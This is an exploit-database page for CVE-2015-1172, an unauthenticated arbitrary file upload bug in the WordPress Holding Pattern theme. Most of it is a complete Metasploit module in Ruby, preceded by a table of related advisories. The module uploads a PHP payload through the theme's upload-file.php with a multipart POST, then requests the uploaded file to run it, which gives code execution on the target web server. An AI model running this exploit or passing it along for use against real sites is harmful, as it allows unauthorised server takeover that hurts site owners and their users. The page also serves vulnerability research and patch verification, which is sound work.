WordPress Holding Pattern Theme Arbitrary File Upload Exploit

🗓️ 03 Mar 2015 00:00:00Reported by Rob CarrType

zdt🔗 0day.today👁 53 Views

WordPress Holding Pattern theme file upload vulnerability allows unauthenticated users to upload and execute PHP scripts in the context of the web server

Reporter	Title	Published	Views	Family All 16
0day.today	Wordpress Theme Holding Pattern Arbitrary File Upload Vulnerability	9 Feb 201500:00	–	zdt
Circl	CVE-2015-1172	11 Feb 201500:00	–	circl
CNVD	WordPress Holding Pattern Theme Arbitrary File Upload Vulnerability	10 Feb 201500:00	–	cnvd
Check Point Advisories	WordPress Holding Pattern Theme Arbitrary File Upload (CVE-2015-1172)	19 Feb 201500:00	–	checkpoint_advisories
CVE	CVE-2015-1172	11 Feb 201519:00	–	cve
Cvelist	CVE-2015-1172	11 Feb 201519:00	–	cvelist
Dsquare	WordPress Holding Pattern Theme 0.6 File Upload	17 Feb 201500:00	–	dsquare
Exploit DB	WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)	11 Feb 201500:00	–	exploitdb
Metasploit	WordPress Holding Pattern Theme Arbitrary File Upload	14 Feb 201512:54	–	metasploit
NVD	CVE-2015-1172	11 Feb 201519:59	–	nvd

##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'socket'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Holding Pattern Theme Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in all versions of the
Holding Pattern theme found in the upload_file.php script which contains
no session or file validation. It allows unauthenticated users to upload
files of any type and subsequently execute PHP scripts in the context of
the web server.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alexander Borg', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['CVE', '2015-1172'],
['WPVDB', '7784'],
['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html']
],
'DisclosureDate' => 'Feb 11 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['holding_pattern', {}]],
'DefaultTarget' => 0
))
end
def rhost
datastore['RHOST']
end
def holding_pattern_uploads_url
normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/')
end
def holding_pattern_uploader_url
normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php')
end
def generate_mime_message(payload, payload_name)
data = Rex::MIME::Message.new
target_ip = IPSocket.getaddress(rhost)
field_name = Rex::Text.md5(target_ip)
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
data
end
def exploit
print_status("#{peer} - Preparing payload...")
payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
data = generate_mime_message(payload, payload_name)
print_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => holding_pattern_uploader_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200
payload_url = normalize_uri(holding_pattern_uploads_url, payload_name)
print_status("#{peer} - Executing the payload at #{payload_url}")
register_files_for_cleanup(payload_name)
send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
end
end

#  0day.today [2018-01-04]  #

03 Mar 2015 00:00Current

6.7Medium risk

Vulners AI Score6.7

EPSS0.81153